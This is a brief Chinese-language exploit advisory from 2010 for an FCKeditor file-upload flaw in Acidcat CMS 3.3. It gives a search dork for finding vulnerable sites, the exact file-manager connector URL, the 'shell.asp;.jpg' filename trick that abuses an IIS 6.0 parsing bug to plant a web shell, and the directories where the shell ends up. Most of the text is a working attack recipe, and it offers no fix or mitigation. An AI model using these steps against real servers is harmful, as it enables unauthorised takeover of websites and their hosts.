Acidcat CMS v 3.3 (fckeditor)上传漏洞

发布日期：2010-11.23
发布作者：Net.Edit0r

影响版本：V3.3
官方地址：http://www.acidcat.com/

漏洞类型：文件上传
漏洞描述：Acidcat CMS v 3.3使用 fckeditor编辑器，上传shell.asp;.jpg通过IIS6.0解析bug获取权限。

Dork : [ "Powered by Acidcat CMS " ]

===[ Exploit ]===

[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp

[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

[»] http://server/read_write/file/[Shell]

[»] http://server/public/File/[Shell]
 

标签分类：